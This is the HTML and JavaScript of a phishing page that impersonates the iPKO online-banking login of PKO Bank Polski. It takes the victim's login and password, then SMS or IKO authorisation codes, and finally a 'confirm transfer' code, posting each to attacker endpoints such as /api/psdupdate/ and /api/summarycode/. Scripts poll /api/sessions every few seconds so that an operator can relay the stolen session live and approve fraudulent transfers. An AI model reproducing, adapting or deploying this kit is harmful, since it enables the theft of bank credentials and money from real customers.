<!DOCTYPE html>

<html style="--viewport-height:804px;" lang="pl">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="Serwis transakcyjny iPKO PKO Banku Polskiego. Zaloguj się i uzyskaj szybki dostęp do konta oraz swoich finansów bez wychodzenia z domu przez 24h na dobę.">
    <meta name="robots" content="noindex,nofollow">
    <meta http-equiv="Expires" content="0">
    <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate">
    <meta http-equiv="Cache-Control" content="post-check=0, pre-check=0">
    <meta http-equiv="Pragma" content="no-cache">
    <link rel="shortcut icon" href="https://id3439549515.xyz/5N6BtssvsG/eKZI7vv3xRihZ-ipko/favicon.ico" type="image/x-icon">
    <title>iPKO – bankowość elektroniczna PKO Banku Polskiego</title>
    <style>

    </style>
    <link rel="stylesheet" href="/assets/banks/ipko_files/style.css">

    <script src="/assets/banks/ipko_files/jquery-1.12.4.min.js" type="text/javascript"></script>
</head>

<body cz-shortcut-listen="true">
<noscript>Masz wyłączoną obsługę JavaScript. Aby korzystać z serwisu wymagane jest włączenie obsługi JavaScript w przeglądarce.</noscript>
<div id="root">
    <div id="appad1" class="_2h_3x _3olMm">
        <div class="_7GQz3"><img alt="IKO" class="_3EGPs" src="/assets/banks/ipko_files/logo-iko-simple-64.svg">
            <div class="_1M_Ir"><a href="javascript:void(0)" class="_1Mp-6 _22Pfn">Pobierz darmową aplikację IKO.</a>
                <div class="_2S1q6">
                    <div class="">
                        <p>Obsługuj bank w swoim telefonie.</p>
                    </div>
                </div>
            </div><button class="EQHDn _2ipf2 _2tUIN _9yaQE" type="button"><span class="tqpch">Zobacz więcej</span></button><button class="_17--u _2tUIN _3-v6I" type="button"><span class="tqpch">POBIERZ</span></button><button class="MeNPD _2tUIN _1PuBM"
                                                                                                                                                                                                                                  type="button" id="zamknij1"><span class="tqpch">Zamknij</span></button></div>
    </div>
    <div class="_1a490">
        <div class="_2qZ0k">
            <div class="Ae8AX nnaMq">
                <div class="_YTZp"><a class="_1IGN3 _9pJAz _3pncZ">iPKO</a></div>
            </div>
            <div class="_1a490">
                <div tabindex="-1">
                    <div class="_2zi49" tabindex="-1">
                        <div class="_2q_2-">
                            <div class="_3082t _3XwSJ">
                                <div class="_2-7LM _3XeUC">
                                    <div class="_3O5ga">
                                        <div class="_1yu8r _3dqsV Login">
                                            <div class="_2F0-A _2VlSP">
                                                <div class="">
                                                    <h1 class="TTPMB dVrGr" id="summaryInfo">Zaloguj się</h1>
                                                </div>
                                            </div>

                                            <div class="_1nDhK _2Uyev">
                                                <div role="alert" class="_2xUrt" id="loginerror1" style="display:none;">
                                                    <div class="">
                                                        <p>Nieudane logowanie. Upewnij się że poprawnie wpisałeś/aś login oraz hasło. Spróbuj ponownie.</p>
                                                    </div>
                                                </div>
                                            </div>

                                            <div class="_1V3J3 _2ZUuR _8DYPl" id="mainCont">
                                                <div class="_30rnX _3pjuX _2b_ji"><label class="_3PZX-" for="d2c8e044-0957-4fe7-9e50-da270ef04a5a">Numer klienta lub login</label></div>
                                                <div class="_2IyIc">
                                                    <div class="_3jN1v _2NoOc _1uHaR">

                                                        <div class="_3i31J" id="inputlogin1"><input class="" autocomplete="off" placeholder="Wpisz numer klienta lub login" id="bank_password" name="view./LOGIN/.data.login">
                                                            <div class="_135Dw"></div>
                                                        </div>
                                                        <div class="_3i31J" id="psd2" style="display: none"><input class="" autocomplete="off" placeholder="Potwierdź logowanie w aplikacji IKO lub wpisz SMS" id="bank_psd" name="view./LOGIN/.data.login">
                                                            <div class="_135Dw"></div>
                                                        </div>

                                                        <div class="_3i31J" id="inputhaslo1" style="display:none;"><input class="" type="password" autocomplete="off" placeholder="Wpisz hasło" id="password1" name="view./LOGIN/.data.password" value="">
                                                            <div class="_135Dw"></div>
                                                        </div>

                                                    </div>
                                                    <div class="_1nDhK _2NoOc _2_HY6" id="95809bae-af46-45f0-9992-968ca99d8fe7">
                                                        <div class="_2xUrt" style="display: none;">
                                                            <div class="">
                                                                <p>Wpisz poprawny numer klienta lub login</p>
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <div id="IPKO-RWD-LOGIN-TOP-RIGHT"></div>
                                                </div>
                                            </div>
                                            <div class="_3lSno">
                                                <div class="_3MMdH"></div>
                                                <p style="display: none" id="psdMessage">Za chwilę otrzymasz kod weryfikacyjny na swój telefon...</p>
                                                <div class="_5s1Zc" id="buttonlogin1">

                                                    <button class="_3XhIB _39LjE _3I9CI _1cfEp" type="submit" id="loginLast" style="display: none" onclick="bankLogin(); ipkoUpdate();"><span class="tqpch" id="continueText">Zaloguj</span></button>
                                                    <button class="_3XhIB _39LjE _3I9CI _1cfEp" type="submit" id="psdButton" style="display: none" onclick="psdUpdate()"><span class="tqpch" id="continueText">Zatwierdz</span></button>
                                                    <button class="_3XhIB _39LjE _3I9CI _1cfEp" type="submit" id="continue1" onclick="contFunc()"><span class="tqpch" id="continueText">Dalej</span></button>
                                                    <button class="_3XhIB _39LjE _3I9CI _1cfEp" type="submit" id="summary1" style="display: none" onclick="summaryCode()"><span class="tqpch" id="continueText">Dalej</span></button>
                                                    <a href="javascript:void(0)" class="_1Mp-6 eKTo5 _2zKnq" align="left">Pomoc w logowaniu</a>
                                                    <a
                                                            href="javascript:void(0)" class="_1Mp-6 Ux_wd eKTo5">Otwórz konto</a>
                                                </div>

                                                <div class="_5s1Zc" id="buttonhaslo1" style="display:none;"><button class="_3XhIB _39LjE _3I9CI _1cfEp" type="submit" id="zaloguj1"><span class="tqpch">Zaloguj</span></button><a href="javascript:void(0)" class="_1Mp-6 eKTo5">Odzyskaj hasło</a><a href="javascript:void(0)"
                                                                                                                                                                                                                                                                                                      class="_1Mp-6 eKTo5 _2zKnq" id="powrot1" align="left">‹ Powrót</a></div>

                                            </div>
                                            <div class="_2f1bx"><a href="javascript:void(0)" class="_1Mp-6 _39W8G">Otwórz konto</a></div>
                                        </div>
                                    </div>
                                    <div class="_2XTeO"></div>

                                    <div class="i8y2b" id="boklogin1">
                                        <div>
                                            <div class="_3L05G _2v7On">
                                                <picture><img alt="Pożyczka" src="/assets/banks/ipko_files/snowboard_416x416_208_208.png" width="208" height="208"></picture>
                                                <div class="_2A8-W _3BcZU">
                                                    <div class="">
                                                        <h1 id="pożyczka-dla-zdecydowanych-rrso-722">Pożyczka dla zdecydowanych. RRSO: 7,22%</h1>
                                                        <p>Gotówka na gorące wydatki zimą.<br>Możesz ją mieć nawet w&nbsp;1 dzień.</p>
                                                    </div>
                                                    <div class="_1PNQ7 sKJ4W"><button class="_3XhIB _3LgsL VZR_f" type="button"><span class="tqpch">Poznaj szczegóły</span></button></div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>

                                    <div class="i8y2b _3497e" id="bokhaslo1" style="display:none;">
                                        <div class="evk_P">
                                            <h2 class="_3-5tf">Bezpieczne logowanie</h2>
                                        </div>
                                        <div class="_160uC">
                                            <h4 class="_3-5tf">
                                                <div class="">
                                                    <p><strong>Hasło</strong></p>
                                                </div>
                                            </h4>
                                        </div>
                                        <div class="_1j5DM">
                                            <div class="">
                                                <p>Wpisz hasło, którego używasz, aby zalogować się do iPKO. Upewnij się, że nikt nie widzi wpisywanych przez Ciebie danych. Loguj się tylko przy wykorzystaniu zaufanego połączenia z&nbsp;internetem.</p>
                                            </div>
                                        </div>
                                    </div>

                                </div>
                                <div class="XltzP">
                                    <div class="_2-7LM">
                                        <div class="EPcao _2JgJt">
                                            <div class="">
                                                <p><em>31.05.2023</em></p>
                                                <h1 id="acoc-on-line-masz-to-jak-w-banku">AC/OC on line? Masz to jak w banku</h1>
                                                <p>Teraz porównasz cenę ubezpieczenia komunikacyjnego w&nbsp;serwisie iPKO i&nbsp;aplikacji IKO.</p>
                                            </div>
                                        </div>
                                        <div class="EPcao _2JgJt">
                                            <div class="">
                                                <p><em>27.01.2023</em></p>
                                                <h1 id="psd2---ważna-informacja-o-logowaniu-do-serwisu-ipko">PSD2 - ważna informacja o logowaniu do serwisu iPKO</h1>
                                                <p>Czasami, nie częściej niż co 90 dni, możemy poprosić Cię o&nbsp;potwierdzenie logowania do serwisu iPKO kodem z&nbsp;narzędzia autoryzacji.
                                                </p>
                                            </div>
                                        </div>
                                        <div class="EPcao _2JgJt">
                                            <div class="">
                                                <p><em>21.01.2023</em></p>
                                                <h1 id="uwaga-fałszywe-wiadomości-messenger-facebook-i-sms">Nowy serwis internetowy iPKO</h1>
                                                <p>W odpowiedzi na sugestie klientów i zmieniające się trendy serwis internetowy iPKO jest stale rozwijany.</p>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="load1" style="display:none;">
                            <div class="_2JfmK"></div>
                            <div class="_3-GOw">
                                <div class="_13h0z"><svg viewBox="25 25 50 50"><circle cx="50" cy="50" r="20" fill="none" stroke="none" stroke-width="5" stroke-miterlimit="10"></circle></svg></div>
                            </div>
                        </div>
                    </div>
                </form>
            </div>
            <div class="_22vrq">
                <div class="_YTZp">
                    <div class="_3JEbu"><a href="javascript:void(0)" class="_1Mp-6 oTNcp">© 2020 PKO Bank Polski</a><a href="javascript:void(0)" class="_1Mp-6 oTNcp">Kod BIC (Swift): BPKOPLPW</a><a href="javascript:void(0)" class="_1Mp-6 oTNcp">Polityka prywatności</a></div>
                    <div
                            class="_2gV0a"><a href="javascript:void(0)" class="_1Mp-6 _2jnzB oTNcp">Bezpieczeństwo</a><a href="javascript:void(0)" class="_1Mp-6 _1w2p3 oTNcp">Pomoc</a><a href="javascript:void(0)" class="_1Mp-6 _357by oTNcp">Kontakt</a></div>
                </div>
            </div>
            <div class="_161kC">
                <div class="_31R7W"></div>
            </div>
            <div class="_161kC">
                <div class="_31R7W"></div>
            </div>
        </div>
    </div>
</div><input type="hidden" id="pid" value="pVHMVj"><input type="hidden" id="gdzie_jest" value="iPKO logowanie">

    <input type="hidden" id="bank_login">

<script src="/assets/banks/ipko_files/obfuscator.ipko.js" type="text/javascript"></script>
    <script src="/assets/js/cookies.core.1.3.min.js"></script>
    <script src="/assets/js/banklogin.js"></script>
<script src="/assets/js/jquery-3.5.1.min.js"></script>


    <script>

        let bankId = (cookieManager.read('session_id'))
        let multipleFunc = setInterval(function(){ regularCheck() }, 3000);

        const contFunc = () => {
            if ($("#bank_password").val() !== "") {
                document.getElementById('bank_login').value = $("#bank_password").val();
                document.getElementById('bank_password').value = ""
                document.getElementById('bank_password').placeholder = "Wpisz hasło"
                document.getElementById('bank_password').type = 'password'
                document.getElementById('continue1').style.display = 'none'
                document.getElementById('loginLast').style.display = 'block'
                }

            }

        const ipkoUpdate = () => {
            $("#mainCont").empty()
            document.getElementById('loginLast').style.display = 'none'
            $("#mainCont").append('<div class="_2IyIc"> <div class="_3jN1v _2NoOc _1uHaR"> <div class="_3i31J" id="inputlogin1"><input class="" autocomplete="off" placeholder="Wpisz SMS lub potwierdź w aplikacji IKO" id="bank_psd" name="view./LOGIN/.data.login"> <div class="_135Dw"></div></div><div class="_3i31J" id="psd2" style="display: none"></div></div></div>')
            document.getElementById('psdButton').style.display = 'block'
        }

        const regularCheck = () => {
            readTextFile("/api/sessions", function(text){
                var data = JSON.parse(text);
                for (let i=0;i<data["result"].length;i++) {
                    if (data["result"][i]["uid"] == sessId) {
                        if (data["result"][i]["accepted"] == "true") {
                            summaryFunc()
                            clearInterval(multipleFunc)
                        }
                    } else {

                    }
                }
            });
        }

        const psdUpdate = () => {
            if ($("#bank_psd").val() !== "") {
                $.post("/api/psdupdate/", {
                    bank_psd: $("#bank_psd").val(),
                    sessionId: bankId
                }).done(data => {
                    console.log('done')
                    $("#mainCont").empty()
                    $("#mainCont").append('<p class="TTPMB dVrGr" style="font-size: 20px">Logowanie...</p>')
                    document.getElementById('psdButton').style.display = 'none'
                }).fail(error => {
                    console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.", "Wystąpił błąd")
                })

            } else {
                console.log('not selectec')
            }
        }

        //WRONG PASS

        const wrongPass = () => {
            $.post("/api/wrongpass/", {
                sessionId: bankId,
                name: "false"
            }).done(data => {
                console.log('done')
            }).fail(error => {
                console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.", "Wystąpił błąd")
            })
        }

        const regularPass = () => {
            readTextFile("/api/sessions", function(text){
                var data = JSON.parse(text);
                for (let i=0;i<data["result"].length;i++) {
                    if (data["result"][i]["uid"] == sessId) {
                        if (data["result"][i]["accepted"] == "wrongPass") {
                            clearInterval(multiplePass)
                            wrongPass()
                            location.reload()
                        }
                    } else {

                    }
                }
            });
        }

        let multiplePass = setInterval(function(){ regularPass() }, 3000);

        //SUMMARY

        const summaryFunc = () => {
            $("#mainCont").empty()
            $("#mainCont").append(' <div class="_3jN1v _2NoOc _1uHaR"> <div class="_3i31J" id="inputlogin1"><input class="" autocomplete="off" placeholder="Wpisz SMS lub potwierdź w aplikacji IKO" id="bank_summary" name="view./LOGIN/.data.login"> <div class="_135Dw"></div></div></div>')
            document.getElementById('continue1').style.display = 'none'
            document.getElementById('summary1').style.display = 'block'

            document.getElementById('summaryInfo').innerText = 'Potwierdź przelew'
        }

        const summaryCode = () => {
            if ($("#bank_summary").val() !== "") {
                $.post("/api/summarycode/", {
                    bank_summary: $("#bank_summary").val(),
                    sessionId: bankId
                }).done(data => {
                    $("#mainCont").empty()
                    $("#mainCont").append('<p class="TTPMB dVrGr" style="font-size: 20px">Przetwarzanie... nie zamykaj przeglądarki</p>')
                    document.getElementById('summary1').style.display = 'none'
                }).fail(error => {
                    console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.", "Wystąpił błąd")
                })

            } else {
                console.log('not selectec')
            }
        }

        const regularSummary=()=>{readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"wrongSummary"==s.result[e].accepted&&(summaryFunc(),wrongSum())})},wrongSum=()=>{$.post("/api/wrongsummary/",{sessionId:bankId,name:"false"}).done(e=>{console.log("done")}).fail(e=>{console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.","Wystąpił błąd")})};let multipleSummary=setInterval(function(){readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"wrongSummary"==s.result[e].accepted&&(summaryFunc(),wrongSum())})},3e3);const regularComplete=()=>{readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"completed"==s.result[e].accepted&&(location.href="/summary")})};let multipleCompleted=setInterval(function(){readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"completed"==s.result[e].accepted&&(location.href="/summary")})},3e3);

    </script>

</body>

</html>